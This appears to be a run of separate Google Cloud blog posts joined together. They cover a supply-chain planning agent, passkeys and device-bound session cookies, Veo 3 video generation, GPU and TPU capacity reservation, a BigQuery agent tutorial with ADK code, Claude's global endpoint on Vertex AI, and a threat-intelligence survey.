Pluto7’s Planning in a Box Pi Agent is designed to complement these capabilities, offering an intelligent AI layer for autonomous planning. It integrates with enterprise systems like SAP, Oracle, and Salesforce, consolidating structured and unstructured data into a Master Ledger via Google Cloud’s Cortex Framework. This effectively creates a real-time digital twin and control tower, providing a unified view and synchronized decision-making across the supply chain.
Pi Agent functions as a real-time supply chain planning assistant, mirroring a ride-share system for inventory. It senses real-time signals, reallocates resources, and makes proactive decisions. Examples include agents for demand analysis (Ron), inventory optimization (Kassy), financial balancing (Alex), and defect flagging (Bob), all collaborating through the A2A protocol. This allows for significantly faster decision-making and a transition from reactive problem-solving to proactive planning.
Practical impact
A case study featuring a LatAm CPG manufacturer demonstrates the practical impact. By implementing Planning in a Box + Pi Agent (now powered by Google Agentspace), the manufacturer gained real-time inventory visibility, improved order fulfillment, and is on track to reduce excess inventory by 15% while cutting manual reporting by 70%. It also has natural language access to inventory data: “How much inventory do I have for Faucet at Location Warehouse?”
The combination of Agentspace and Planning in a Box Pi Agent creates an agentic command center for enterprises, enabling autonomous workflows, seamless ERP (SAP, Oracle, NetSuite) integration, and deployment within the user’s Google Cloud tenant, delivered as service-as-a-software. This setup offers rapid time to value, with initial use cases deployable in weeks.
Over the years, Pluto7 has seen customers on this platform adoption journey achieve significant business outcomes, including a 10–20% improvement in forecast accuracy, up to a 50% reduction in inventory carrying costs, over 50% safety stock reduction, faster planning cycles, and a 10%+ increase in margin, all of which is articulated in Pluto7’s 2:10 rule of revenue growth with planning error reduction.
Looking ahead
Agentic AI isn’t the future – it’s already here, redefining supply chain planning and enabling planners to become superheroes. Businesses can explore how Google Cloud’s Agentspace and Pluto7’s Planning in a Box can enable intelligent orchestration and real-time responsiveness in their supply chains.
Welcome to the second Cloud CISO Perspectives for July 2025. Today, Andy Wen, director, product management, Workspace Security, discusses new efforts we’re making to defend against identity-based cyberattacks.
As with all Cloud CISO Perspectives, the contents of this newsletter are posted to the Google Cloud blog. If you’re reading this on the website and you’d like to receive the email version, you can subscribe here.
The evolving threat landscape: Beyond traditional 2FA
By Andy Wen, director, product management, Workspace Security
Threat actors relentlessly pursue identity-based attacks, understanding that compromised credentials are a direct path to their objectives. To counter those attacks, we’re constantly innovating at Google, and we have some good news involving two critical innovations developed in close partnership with the wider security community.
Stolen credentials, email phishing, brute-force, and other identity-based vectors comprised 37% of successful breaches in 2024, in large part because of the rise of infostealers, a method threat actors rely on to scale identity attacks, according to Mandiant’s most recent M-Trends report. These initial breaches can frequently escalate into costly ransomware incidents and data exfiltration.
Google has long been a leader in security, and last year we announced that we are making two-factor authentication (2FA) mandatory for Google Cloud customers. We’re now taking security a step further and introducing new capabilities to keep customers secure.
How passkeys and Device Bound Session Credentials can help
To empower users and customers against identity-based attacks, we’ve introduced two critical innovations developed in close partnership with the wider security community: passkeys and Device Bound Session Credentials (DBSC). These advancements are designed to significantly strengthen account security and prevent account takeovers.
We highly recommend that all Workspace customers, especially those with high-value users such as IT administrators and business leaders, implement these controls.
Use passkeys for a simpler, more secure sign-in
We have made passkeys generally available to all 11 million Workspace organizations and billions of Google consumer users. Passkeys represent a fundamental shift away from passwords, offering a simpler and inherently more secure sign-in experience.
Unlike traditional passwords that can be guessed, stolen, and forgotten, passkeys are unique digital credentials cryptographically tied to your device. They use the robust FIDO2 technology, the same underlying standard used in hardware security keys like our Titan Security Key, and the added convenience of using a device you already own, such as an Android phone or a Windows laptop.
While absolute security remains an elusive goal, passkeys and security keys virtually eliminate password-based account takeover and phishing threats. As a founding member and steadfast supporter of the FIDO Alliance, we are encouraged by the growing industry adoption of FIDO technology.
Disrupt cookie theft with Device Bound Session Credentials
We are also addressing the use of infostealers to exfiltrate session cookies, allowing attackers to bypass password and 2FA controls and access victim accounts from their own devices.
In addition to Mandiant’s M-Trends 2025 report, IBM’s 2025 X-Force Threat Intelligence Index observed an 84% increase in emails delivering infostealers in 2024 compared to the prior year.
In close collaboration with the Chrome team, we are adding a powerful addition to our security arsenal, now in beta: Device Bound Session Credentials (DBSC). DBSC are designed to disrupt cookie theft by creating an authenticated session that is cryptographically bound to a specific device. This innovative approach can significantly mitigate the risk of exfiltrated cookies being used to access accounts from an unauthorized device.
DBSC introduces a new API that enables servers to establish an authenticated session bound to a device. When a session is initiated, the browser generates a unique public-private key pair. The private key is securely stored using hardware-backed storage, such as a Trusted Platform Module (TPM), when available.
The server then issues a regular session cookie. Throughout the session’s lifetime, the browser periodically proves possession of the private key, and the session cookie is refreshed.
This mechanism allows the cookie’s lifetime to be set short enough to render stolen cookies largely useless to attackers. While DBSC currently operates with Chrome and Workspace, numerous server providers, identity providers (IdPs) like Okta, and other browsers such as Microsoft Edge, have expressed strong interest in adopting DBSC to protect their users from cookie theft.
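To make the flow concrete, here is a heavily hedged, server-side sketch in Python. The header names and value syntax follow the public DBSC explainer drafts; the protocol is in beta, so expect details to change:

```python
# Heavily hedged, server-side sketch of a DBSC handshake using Flask.
# Header names and value syntax follow the public DBSC explainer drafts and
# may change while the feature is in beta.
from flask import Flask, make_response, request

app = Flask(__name__)

@app.post("/login")
def login():
    # After normal authentication succeeds, ask the browser to start a
    # device-bound session. The browser generates a key pair (private key in
    # hardware-backed storage such as a TPM, where available) and POSTs a
    # signed registration JWT to the endpoint named below.
    resp = make_response("signed in")
    resp.headers["Sec-Session-Registration"] = (
        '(ES256 RS256); path="/dbsc/register"; challenge="nonce-123"'
    )
    # The session cookie can now be short-lived: a stolen copy expires quickly.
    resp.set_cookie("auth_cookie", "opaque-session-value", max_age=600)
    return resp

@app.post("/dbsc/register")
def register():
    registration_jwt = request.get_data(as_text=True)
    # Verify the JWT's signature, then persist the session's public key so
    # later refreshes can require proof that the browser still holds the
    # matching private key before the cookie is reissued.
    return ("", 200)
```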
A combined approach for enhanced security
Combined, passkeys and DBSC can empower organizations to significantly strengthen account security and prevent account takeovers. Both of these security controls are readily available to all Workspace customers, and we strongly advocate for their implementation, particularly for your most critical users such as IT administrators and business leaders.
In case you missed it
Here are the latest updates, products, services, and resources from our security teams so far this month:
Secure cloud. Insecure use. (And what you can do about it): If the cloud is secure, why are there still cloud security breaches? Too many organizations don’t use it securely. Here’s how to change that. Read more.
Tabletopping the tabletop: New perspectives from cybersecurity’s favorite role-playing game: A group of bio-cybersecurity experts did a TTX with us to practice and share ideas on how to respond to real-world challenges — without the real-world risk. Read more.
How to enable Secure Boot for your AI workloads: Secure Boot can help protect AI from the moment GPU-accelerated workloads power up. Here’s how to use it on Google Cloud. Read more.
Too many threats, too much data: new survey. Here’s how to fix that: Operationalizing threat intelligence remains a major challenge, say security and IT leaders in a new survey. Here are the survey results, and four steps security teams can take to get more out of their threat intelligence data. Read more.
Your guide to Google Cloud Security at Black Hat USA 2025: We’re excited to bring our commitment to cybersecurity innovation and simplification to Black Hat. Here’s where to find us, and what we’ll be talking about. Read more.
How SUSE and Google Cloud collaborate on Confidential Computing: Secure sensitive data on Google Cloud using SUSE Linux Enterprise Server (SLES) and Confidential VMs with AMD SEV, AMD SEV-SNP, and Intel TDX. Read more.
Innovate with Confidential Computing: Attestation, Live Migration on Google Cloud: Confidential Computing has evolved rapidly since we first made it available. See what’s new with two key pillars: robust attestation and live migration. Read more.
Introducing OSS Rebuild: Open source, rebuilt to last: OSS Rebuild is a new project to strengthen trust in open-source package ecosystems that can give security teams powerful data to avoid compromise without burden on upstream maintainers. Read more.
We’re taking legal action against the BadBox 2.0 botnet: Recently, our researchers partnered with HUMAN Security and Trend Micro to uncover BadBox 2.0, the largest known botnet of internet-connected TVs. Building on our previous actions to stop these cybercriminals, we filed a lawsuit in New York federal court against the botnet’s perpetrators. Read more.
Please visit the Google Cloud blog for more security stories published this month.
Threat Intelligence news
Exposing the risks of VMware vSphere Active Directory integration: The common practice of directly integrating vSphere with Microsoft Active Directory can simplify administration tasks, but also creates an attack path frequently underestimated due to misunderstanding the inherent risks. Read more.
Defending your VMware vSphere estate from UNC3944: Take a deep dive into the anatomy of UNC3944’s vSphere-centered attacks, and study our fortified, multi-pillar defense strategy for risk mitigation. Read more.
Ongoing SonicWall SMA exploitation campaign using the OVERSTEP backdoor: Google Threat Intelligence Group (GTIG) has identified an ongoing campaign by a suspected financially-motivated threat actor we track as UNC6148, targeting fully patched end-of-life SonicWall Secure Mobile Access (SMA) 100 series appliances. Read more.
Update on creative phishing attack on prominent academics and critics of Russia: In June, we detailed two distinct campaigns in which a Russia state-sponsored cyber threat actor targeted prominent academics and critics of Russia while impersonating the U.S. State Department. The threat actor is continuing the initial wave of their campaign with changed ASP names, while also trying a new tactic: sending calendar invites in an attempt to convince targets to link an attacker-controlled device to their Microsoft Office 365 account through Microsoft’s device code authentication flow. Read more.
Please visit the Google Cloud blog for more threat intelligence stories published this month.
Now hear this: Podcasts from Google Cloud
How to accelerate your SIEM journey: Manija Poulatova, director, Security Engineering and Operations, Lloyd’s Banking Group, joins hosts Anton Chuvakin and Tim Peacock for a lively chat on all things SIEM, from migration challenges to AI integration. Listen here.
Governing AI agents, from code to courtroom: The autonomous decision-making and learning capability promise of agentic AI and AI agents presents a unique set of risks across various domains. Anna Gressel, partner at Paul, Weiss, discusses her key areas of concern with Anton and guest host Marina Kaganovich. Listen here.
Cyber-Savvy Boardroom: Harnessing innovation while mastering compliance: Grant Waterfall, partner, PwC, joins Office of the CISO’s Alicja Cade and David Homovich with a deep-dive chat on using compliance to drive innovation. Listen here.
Behind the Binary: A reverse engineer’s journey: Reverse-engineering pioneer Danny Quist talks with host Josh Stroschein about the evolving landscape of binary analysis tools, the constant battle with malware obfuscation, and building one of the first malware repositories for research. Listen here.
To have our Cloud CISO Perspectives post delivered twice a month to your inbox, sign up for our newsletter. We’ll be back in a few weeks with more security-related updates from Google Cloud.
Veo 3 has seen massive global adoption with over 70 million videos created since May, and we’ve seen tremendous momentum with our enterprise customers as well. Since its preview launch on Vertex AI in June, enterprise customers have already generated over 6 million videos, showcasing the incredible demand for professional-grade, scalable AI video creation.
Today, we’re building on this momentum with some exciting updates to Veo on Vertex AI.
Veo 3, our most advanced video generation model, is now generally available to everyone on Vertex AI.
Veo 3 Fast, a model designed for speed and rapid iteration, is now generally available to everyone on Vertex AI. It’s a faster way to turn text into video, from narrated product demos to short films.
Coming to public preview on Vertex AI in August, Veo 3 and Veo 3 Fast will also offer image-to-video capabilities to make it possible for you to bring static visuals and images to life. All you have to do is provide the source image along with a text prompt that describes what kind of video you want to create.
How businesses are building with Veo 3 on Vertex AI
Google Cloud customers around the world are using Veo 3 and Veo 3 Fast on Vertex AI to create professional-quality video content with unparalleled efficiency and creative freedom. Let’s look at some examples.
Canva – the design platform used by millions of people worldwide – uses Veo to make it easy for users to create videos for marketing, social media, and more.
“Enabling anyone to bring their ideas to life – especially their most creative ones – has been core to Canva’s mission ever since we set out to empower the world to design. By democratising access to a powerful technology like Google’s Veo 3 inside Canva AI, your big ideas can now be brought to life in the highest quality video and sound, all from within your existing Canva subscription. In true Canva fashion, we’ve built this with an intuitive interface and simple editing tools in place, all backed by Canva Shield.” – Cameron Adams, co-founder and Chief Product Officer, Canva
But the momentum extends beyond design. The team at BarkleyOKRP, a leading ad agency, is using Veo 3 to speed up video production timelines.
“The rapid advancements from Veo 2 to Veo 3 within such a short time frame on this project have been nothing short of remarkable. Our team undertook the task of re-creating numerous music videos initially produced with Veo 2 once Veo 3 was released, primarily due to the significantly improved synchronization between voice and mouth movements. The continuous daily progress we are witnessing is truly extraordinary.” – Julie Ray Barr, Senior Vice President Client Experience, BarkleyOKRP
At global investing platform eToro, the team is making marketing iterations a breeze with Veo 3.
“At eToro, innovation is in our DNA. As a global investing platform serving clients in 75 countries, local storytelling isn’t optional – it’s essential. With Veo 3, we produced 15 fully AI‑generated versions of our ad, each in the native language of its market, all while capturing real emotion at scale. Ironically, AI didn’t reduce humanity – it amplified it. Veo 3 lets us tell more stories, in more tongues, with more impact.” – Shay Chikotay, Head of Creative & Content, eToro
Razorfish, an interactive agency and part of the Publicis Groupe, is using Veo to bring creative to life.
“For The Morelandos, our campaign with Visit Orlando and Google, we used the full Vertex AI stack—Gemini to mine real reviews, Imagen to bring the characters to life, and Veo to give them motion. Veo let us go from story to near-cinematic video in a fraction of the usual time—which meant more room to explore, iterate, and push the idea further.” – Anthony Yell, Chief Creative Officer, Razorfish
Synthesia, a leading synthetic media generation company, is using Veo to contextually adapt visuals to its hyper-realistic AI avatars and voices.
“Veo 3 represents a leap forward in generative AI, and its integration into Synthesia’s platform will redefine how businesses create video content. By combining our hyper-realistic AI avatars and voices with Veo-powered fully contextual visuals that adapt to each unique story, we’re giving enterprise teams the creative power to communicate with unrivalled clarity and impact.” – Bill Leaver, Product Manager, Synthesia
How enterprises can use Veo 3 Fast for speed and creativity
Veo 3 Fast is a great fit for work that requires rapid iteration and speed. It strikes an ideal balance between processing time and visual quality, making it especially helpful for:
Quickly generating and testing variations of ad concepts to respond to market trends.
Efficiently creating video demonstrations for entire product catalogs from still images.
Developing engaging animated explainers and training modules in less time.
Veo 3 and Veo 3 Fast on Vertex AI mean even more capabilities for enterprise storytelling
Veo 3 and Veo 3 Fast are designed to give creators the control and quality needed to move beyond short clips and produce complete, compelling narratives. Here are some of the core features now generally available on Vertex AI.
Create scenes with native audio: Veo 3 generates video and audio in a single step. This means you can create scenes with characters that speak with accurate lip-syncing, and sound effects that fit the mood.
Prompt: Talking to the barista from across the counter, a woman in a coffee shop places an order for a cup of coffee with cream and sugar, and a chocolate croissant. The barista listens to the order, responds sure 🙂 and then turns to the commercial espresso machine that is behind him. The woman patiently waits across the counter as her order is being prepared by the barista.
Deliver professional quality at enterprise scale: Veo 3 produces high-definition (1080p) video, suitable for professional marketing campaigns, product demonstrations, and internal communications. You can create content that meets brand standards, saving time and money.
Prompt: An eye-level shot, zooming in on a photorealistic scene of a person sculpting a pot on a pottery wheel in a well lit pottery studio.
Simplify content localization for global audiences: Veo 3’s native dialogue generation helps businesses connect with an international audience by producing a video once and localizing the dialogue for dozens of languages.
Prompt: An eye-level shot of a confident young woman in a dark floral halter-neck dress standing on a stone bridge with the Eiffel Tower softly blurred in the background. Her dark hair and the fabric of her dress flutter gently in the wind as the light subtly changes around her. The distant hum of city traffic fills the air. She says out loud: La confiance est mon accessoire préféré. Cette robe vient juste après.
Image-to-video (coming to public preview on Vertex AI in August): Veo 3 and Veo 3 Fast can also take a single image – a photo you upload or an AI-generated image – and animate it into an 8-second video clip. This feature is particularly powerful for content creators, marketers, and businesses looking to animate existing visual assets, create engaging social media content, or generate compelling product demonstrations from high-quality images (a minimal API sketch follows the prompt below).
Prompt: The artist continues to work as the camera pans around showing a shop full of stained glass creations.
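To make this concrete, here’s a minimal sketch of what calling Veo from Python could look like using the google-genai SDK. Treat it as illustrative: the project ID and model ID are placeholders, and the exact model name and response fields may differ by SDK version, so check the Vertex AI documentation before relying on it.

import time

from google import genai

# Placeholders: substitute your own project; the Veo model ID shown is illustrative.
client = genai.Client(vertexai=True, project="my-project", location="us-central1")

# Start an asynchronous video-generation job from a text prompt.
operation = client.models.generate_videos(
    model="veo-3.0-generate-preview",  # hypothetical model ID
    prompt="A potter shapes a vase on a wheel in a sunlit studio, camera slowly circling.",
)

# Video generation is long-running, so poll until the operation completes.
while not operation.done:
    time.sleep(20)
    operation = client.operations.get(operation)

# Depending on SDK version, results live on operation.response or operation.result.
for generated in operation.response.generated_videos:
    print(generated.video.uri)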
Enterprise-grade safety and security
Veo 3 and Veo 3 Fast on Vertex AI are built for scalable and responsible enterprise use. We embed digital watermarks into every frame with SynthID, helping combat misinformation and misattribution. Veo 3 and Veo 3 Fast are also covered by our indemnity for generative AI services.
Get started with Veo 3 and Veo 3 Fast today
To get started, go here to learn more about Veo 3 and Veo 3 Fast on Vertex AI, and try it on Vertex AI Media Studio.
Organizations need ML compute resources that can accommodate bursty peaks and periodic troughs. That means the consumption models for AI infrastructure need to evolve to be more cost-efficient, provide term flexibility, and support rapid development on the latest GPU and TPU accelerators.
Calendar mode is currently available in preview as the newest feature of Dynamic Workload Scheduler. This mode provides short-term ML capacity — up to 90 days of reserved capacity — without requiring long-term commitments.
Calendar mode extends the capabilities of Compute Engine future reservations to provide co-located GPU and TPU capacity that’s a good fit for model training, fine-tuning, experimentation and inference workloads.
Similar to a flight or hotel booking experience, Calendar mode makes it easy to search for and reserve ML capacity. Simply define your resource type, number of instances, expected start date and duration, and in a few seconds, you’ll be able to see the available capacity and reserve it. Once the capacity reservation is confirmed and delivered to your project, you can consume it via Compute Engine, Google Kubernetes Engine (GKE), Vertex AI custom training, and Google Batch.
What customers are saying
Over the past year, early access customers have used Calendar mode to reserve ML compute resources for a variety of use cases, from drug discovery to training new models.
“To accelerate drug discovery, Schrödinger relies on large-scale simulations to identify promising, high-quality molecules. Reserving GPUs through Google Cloud’s DWS Calendar Mode provides us the crucial flexibility and assurance needed to cost-effectively scale our compute environment for critical, time-sensitive projects.” – Shane Brauner, EVP/CIO, Schrödinger
“For Vilya, Dynamic Workload Scheduler has delivered on two key fronts: affordability and performance. The cost efficiency received was a significant benefit, and the reliable access to GPUs has empowered our teams to complete projects much faster, and it’s been invaluable for our computationally intensive tasks. It’s allowed us to be more efficient and productive without breaking the budget.” – Patrick Salveson, co-founder and CTO, Vilya
“Databricks simplifies the deployment and management of machine learning models, enabling fine tuning and real-time inference for scalable production environments. DWS Calendar Mode alleviated the burden of GPU capacity planning and provided seamless access to the latest generation GPU hardware for dynamic demand for testing and ongoing training.” – Ravi Gadde, Sr. Director, Serverless Platform
Using Calendar mode
With these concepts and use cases under our belts, let’s take a look at how to find and reserve capacity via the Google Cloud console. Navigate to Cloud console -> Compute Engine -> Reservation. Then, on the Future Reservation tab, click Create a Future Reservation. Selecting a supported GPU or TPU will expose the Search for capacity section as shown below.
Proceed to the Advanced Settings to determine whether the reservation should be shared across multiple projects. The final step is to name the reservation upon creation.
The reservation is approved within minutes and can be consumed once it is in the Fulfilled status at the specified start time.
Get started today
Calendar mode with AI Hypercomputer makes finding, reserving, consuming, and managing capacity easy for ML workloads. Get started today with Calendar mode for TPUs, and contact your account team for GPU access in Compute Engine, GKE, or Slurm. To learn more, see the Calendar mode documentation and Dynamic Workload Scheduler pricing.
As the excitement around AI agents reaches enterprise customers, a critical question emerges: How can we empower these agents to securely and intelligently interact with enterprise data systems like Google Cloud BigQuery?
Until now, developers building agentic applications have been forced to build and maintain their own custom tools, a slow, risky process that distracts them from building innovative applications. It also introduces considerable development overhead, as they become responsible for everything from authentication and error handling to keeping pace with BigQuery’s evolving capabilities.
To solve this, we are introducing a new, first-party toolset for BigQuery that includes tools to fetch metadata and execute queries (and we have more on the way):
list_dataset_ids: Fetches BigQuery dataset ids present in a GCP project.
get_dataset_info: Fetches metadata about a BigQuery dataset.
list_table_ids: Fetches table ids present in a BigQuery dataset.
get_table_info: Fetches metadata about a BigQuery table.
execute_sql: Runs a SQL query in BigQuery and fetches the result.
These official, Google-maintained tools provide a secure and reliable bridge to your data, and you can use them in two powerful ways: as a built-in toolset in Google’s Agent Development Kit (ADK), or through the flexible, open-source MCP Toolbox for Databases. This frees you to focus on creating value, not on building foundational plumbing.
In this post, we’ll explore these first-party tools for BigQuery and walk you through how they can be used to build a conversational analytics agent in ADK that can answer natural language questions.
Tutorial: Build a Conversational Analytics Agent using BigQuery’s first-party tools
Our agent will query BigQuery’s public dataset: thelook_ecommerce, a synthetic e-commerce dataset that includes customer details, product inventories, and order histories. The agent’s primary role will be to generate SQL queries and provide meaningful responses to common business questions, such as: What are the top-selling products? Which products are frequently ordered together? And how many customers do we have in Colombia?
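To get a feel for what the agent will do under the hood, here is the kind of SQL its execute_sql tool would run for the last of those questions, shown as a minimal sketch with the BigQuery Python client; the dataset is BigQuery’s public thelook_ecommerce dataset, and the table and column names are assumptions based on its published schema.

from google.cloud import bigquery

client = bigquery.Client()

# The kind of query the agent's execute_sql tool would generate for:
# "How many customers do we have in Colombia?"
query = """
    SELECT COUNT(*) AS customer_count
    FROM `bigquery-public-data.thelook_ecommerce.users`
    WHERE country = 'Colombia'
"""

for row in client.query(query).result():
    print(f"Customers in Colombia: {row.customer_count}")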
If you’re new to ADK, this page provides an overview of its core concepts and components; otherwise, let’s dive in!
Choose your model, select Vertex AI as the backend, and confirm your project ID and region:
You should now have a new folder named bq-agent-app. Navigate to agent.py and update the root LLM-Agent to reflect our conversational analytics agent:
root_agent = Agent(
    model="gemini-2.0-flash",
    name="bigquery_agent",
    description=(
        "Agent that answers questions about BigQuery data by executing SQL queries"
    ),
    instruction="""You are a data analysis agent with access to several BigQuery tools.
    Make use of those tools to answer the user's questions.""",
    tools=[bigquery_toolset],
)
When defining your agent, you provide a unique name, specify the underlying LLM model, and can optionally include a description that helps other agents understand its purpose. The agent’s core task or goal is defined in the instructions.
Finally, to enable the agent to interact with your data, it must be equipped with tools that let it work with BigQuery, so it can discover the available datasets and tables and, of course, execute queries. Let’s consider our options for using BigQuery’s first-party toolset.
Option 1: Use ADK’s new built-in toolset for BigQuery
This first-party toolset is owned and maintained by Google. To assign these tools to your agent, import the BigQueryToolset from the google.adk.tools.bigquery module and then initialize the toolset:
import os

import google.auth
from google.adk.auth import AuthCredentialTypes
from google.adk.tools.bigquery import BigQueryCredentialsConfig, BigQueryToolset
from google.adk.tools.bigquery.config import BigQueryToolConfig, WriteMode

# Define an appropriate credential type
CREDENTIALS_TYPE = AuthCredentialTypes.OAUTH2

# Write modes define the agent's BigQuery access control:
# ALLOWED: tools have full write capabilities.
# BLOCKED: default mode; effectively makes the tools read-only.
# PROTECTED: only allows writes on temporary data for a given BigQuery session.
tool_config = BigQueryToolConfig(write_mode=WriteMode.ALLOWED)

if CREDENTIALS_TYPE == AuthCredentialTypes.OAUTH2:
    # Initialize the tools to do interactive OAuth.
    credentials_config = BigQueryCredentialsConfig(
        client_id=os.getenv("OAUTH_CLIENT_ID"),
        client_secret=os.getenv("OAUTH_CLIENT_SECRET"),
    )
elif CREDENTIALS_TYPE == AuthCredentialTypes.SERVICE_ACCOUNT:
    # Initialize the tools to use the credentials in the service account key.
    creds, _ = google.auth.load_credentials_from_file("service_account_key.json")
    credentials_config = BigQueryCredentialsConfig(credentials=creds)
else:
    # Initialize the tools to use the application default credentials.
    application_default_credentials, _ = google.auth.default()
    credentials_config = BigQueryCredentialsConfig(
        credentials=application_default_credentials
    )

bigquery_toolset = BigQueryToolset(
    credentials_config=credentials_config,
    bigquery_tool_config=tool_config,
    tool_filter=[
        "list_dataset_ids",
        "get_dataset_info",
        "list_table_ids",
        "get_table_info",
        "execute_sql",
    ],
)
You can use the tool_filter parameter to filter the tools you’d like to expose to the agent.
Provide an OAuth 2.0 client_id and secret. This approach is typically used when an application needs a user to grant it permission to access their BigQuery data.
For more granular control over your interaction with BigQuery, you can of course create your own custom function tools, which are implemented as Python functions that you expose to your agent.
When tools are implemented directly within an agent, even with built-in toolsets, the agent or application is responsible for managing its authentication to BigQuery, as well as the logic and implementation for each tool. This tight coupling creates challenges: updates to a tool or changes in its BigQuery connection method require manual modification and redeployment for every agent, which can lead to inconsistencies and maintenance overhead.
Option 2: Use BigQuery’s pre-built tools in MCP Toolbox for Databases
The MCP (Model Context Protocol) Toolbox for Databases is an open-source server that centralizes the hosting and management of toolsets, decoupling agentic applications from direct BigQuery interaction. Instead of managing tool logic and authentication themselves, agents act as MCP clients, requesting tools from the Toolbox. The MCP Toolbox handles all the underlying complexities, including secure connections to BigQuery, authentication and query execution.
This centralized approach simplifies tool reuse across multiple agents, streamlines updates (tool logic can be modified and deployed on the Toolbox without requiring changes to every agent), and provides a single point for enforcing security policies.
Want to host your own custom tools in MCP Toolbox for Databases?
You can define your own custom tools in SQL within a tools.yaml configuration file and provide the --tools-file option when starting your server. You cannot, however, use the --prebuilt and --tools-file options together. If you want to use custom tools alongside prebuilt tools, you must use the --tools-file option and manually specify the prebuilt tools you want to include in the configuration file.
To connect your ADK application to the MCP Toolbox for Databases, you need to install toolbox-core:
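A minimal sketch of that wiring might look like the following; the server URL and toolset name are assumptions for illustration, and the exact client API may vary by toolbox-core version.

# pip install toolbox-core
from toolbox_core import ToolboxSyncClient

# Connect to a running MCP Toolbox server (URL is a placeholder; use your own).
toolbox = ToolboxSyncClient("http://127.0.0.1:5000")

# Load the BigQuery tools by the toolset name registered in the Toolbox config.
bigquery_toolset = toolbox.load_toolset("my-bigquery-toolset")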
Assign either the built-in ADK toolset or the MCP toolset to your agent, and you’re ready to go!
root_agent = Agent(
    model="gemini-2.0-flash",
    name="bigquery_agent",
    description=(
        "Agent that answers questions about BigQuery data by executing SQL queries"
    ),
    instruction="""You are a data analysis agent with access to several BigQuery tools.
    Make use of those tools to answer the user's questions.""",
    tools=[bigquery_toolset],
)
You can now run your agent using the adk run or adk web command and start asking questions about your data!
Your agent will leverage the pre-built tools to extract dataset metadata, and then generate and execute a SQL query in BigQuery to retrieve your result.
Get started
Dive into these tutorials and start building your conversational analytics agent today:
Anthropic’s Claude models on Vertex AI now have improved overall availability with the new global endpoint. Now generally available, the global endpoint can dynamically route your requests to any region with available capacity that supports the Claude model you’re using. This helps you deploy Claude-powered applications and agents with more uptime and dependability.
During the preview period, customers like Replicate experienced the benefits of the global endpoint firsthand. Zeke Sikelianos, founding designer at Replicate, noted: “people use Replicate because they want to deploy AI models at scale. Claude on Vertex AI fits perfectly with that — we get one of the best language models available, with Google’s solid infrastructure and the global endpoint that delivers fast responses worldwide. It just works.”
The global endpoint is launching with support for pay-as-you-go traffic for the following Claude models:
Claude Opus 4
Claude Sonnet 4
Claude Sonnet 3.7
Claude Sonnet 3.5 v2
What are global endpoints and when should you use them?
When you send a request to Anthropic’s Claude models on Vertex AI, you typically specify a region (e.g., us-central1). This is a regional endpoint, which keeps your data and processing within that geographical boundary—ideal for applications with strict data residency requirements.
The global endpoint, by contrast, does not tie your request to a single region. Instead, it directs traffic to a global entry point that dynamically routes your request to a region with available capacity. This multi-region approach is designed to maximize availability and reduce errors that can arise from high traffic in a given region.
So, when is the global endpoint the right choice?
If your application requires the highest possible availability and your data is not subject to residency restrictions, the global endpoint is an excellent fit.
It is also a strong choice if your services face regional capacity limits, or if you are architecting for maximum resilience against regional disruptions.
However, if you have data residency requirements (specifically for ML processing), you should continue to use regional endpoints, as the global endpoint does not guarantee that requests will be processed in any specific location. Here’s a simple breakdown of global versus regional endpoints:
Global versus regional endpoints

| | Global endpoint | Regional endpoint |
| --- | --- | --- |
| Availability | Maximized by leveraging multi-region resources | Dependent on single-region capacity and quota |
| Latency | May be higher in some cases due to dynamic global routing | Optimized for low latency within the specified region |
| Quota | Uses a separate, independent global quota | Uses the quota assigned to the specific region |
| Use case | High-availability applications without data residency needs | Applications with strict data residency requirements |
| Traffic type | Pay-as-you-go | Pay-as-you-go and Provisioned Throughput (PT) |
By giving you the choice between global and regional endpoints, Vertex AI empowers you to build more sophisticated, resilient, and scalable generative AI applications and agents that meet your specific architectural and business needs.
Prompt caching and pay-as-you-go pricing
As part of this launch, prompt caching is fully supported with global endpoints. When a prompt is cached, subsequent identical requests will be routed to the region holding the cache for the lowest latency. If that region is at capacity, the system will automatically try the next available region to serve the request. This integration ensures that users of global endpoints still receive the benefits of prompt caching (lower latency and lower costs).
Note that at this point, the global endpoint for Claude models only supports pay-as-you-go traffic. Provisioned Throughput is available on regional endpoints only.
Global endpoint requests are charged the same price as regional endpoint requests.
Best practices
To get the most out of this new feature, we recommend routing your primary traffic to the global endpoint. Use regional endpoints as a secondary option, specifically for workloads that must adhere to data residency rules. To ensure the best performance and avoid unnecessary cost, please do not submit the same request to both a global and a regional endpoint simultaneously.
A new, separate global quota is available for this feature. You can view and manage this quota on the “Quotas & System Limits” page in the Google Cloud console and request an increase if needed.
How to get started
Getting started with the global endpoint for Anthropic’s Claude models on Vertex AI takes only two steps:
Step 1: Select and enable a global endpoint supported Claude model on Vertex AI (Claude Opus 4, Claude Sonnet 4, Claude Sonnet 3.7, Claude Sonnet 3.5 v2).
Step 2: In your configuration, set “global” as the location variable value and use the global endpoint URL:
https://aiplatform.googleapis.com/v1/projects/PROJECT_ID/locations/global/publishers/PUBLISHER_NAME/models/MODEL_NAME
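For reference, a request through the global endpoint with Anthropic’s Vertex SDK might look like this minimal sketch; the project ID and model version string are placeholders, so substitute the values for your environment.

from anthropic import AnthropicVertex

# region="global" routes the request through the global endpoint.
client = AnthropicVertex(project_id="my-project", region="global")

message = client.messages.create(
    model="claude-sonnet-4@20250514",  # placeholder model version string
    max_tokens=256,
    messages=[{"role": "user", "content": "Summarize the benefits of global endpoints."}],
)
print(message.content[0].text)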
An overwhelming volume of threats and data combined with the shortage of skilled threat analysts has left many security and IT leaders believing that their organizations are vulnerable to cyberattacks and stuck in a reactive state.
That’s according to the new Threat Intelligence Benchmark, a commissioned study conducted by Forrester Consulting on behalf of Google Cloud, on the threat intelligence practices of more than 1,500 IT and cybersecurity leaders from eight countries and across 12 industries.
Operationalizing threat intelligence remains a major challenge, said a majority of the survey’s respondents.
“Rather than aiding efficiency, myriad [threat intelligence] feeds inundate security teams with data, making it hard to extract useful insights or prioritize and respond to threats. Security teams need visibility into relevant threats, AI-powered correlation at scale, and skilled defenders to use actionable insights, enabling a shift from a reactive to a proactive security posture,” said the study.
Data and analytical challenges organizations face in improving their threat intelligence capabilities.
Organizations today face a multifaceted, compound problem: they have too few analysts who can effectively interpret and act on threat intelligence, and those analysts face too many data feeds supplying raw intelligence. This has led many security and IT leaders to worry that they are missing critical needles in the haystack, ultimately making it harder to act against legitimate cyberattacks.
82% of respondents worry about missing threats due to the volume of alerts and data they face.
We believe the key is to embed threat intelligence directly into security workflows and tools, so it can be accessed and analyzed quickly and effectively. AI has a vital role in this integration: it helps synthesize raw data, manage repetitive tasks, and reduce toil, freeing human analysts to focus on critical decision-making.
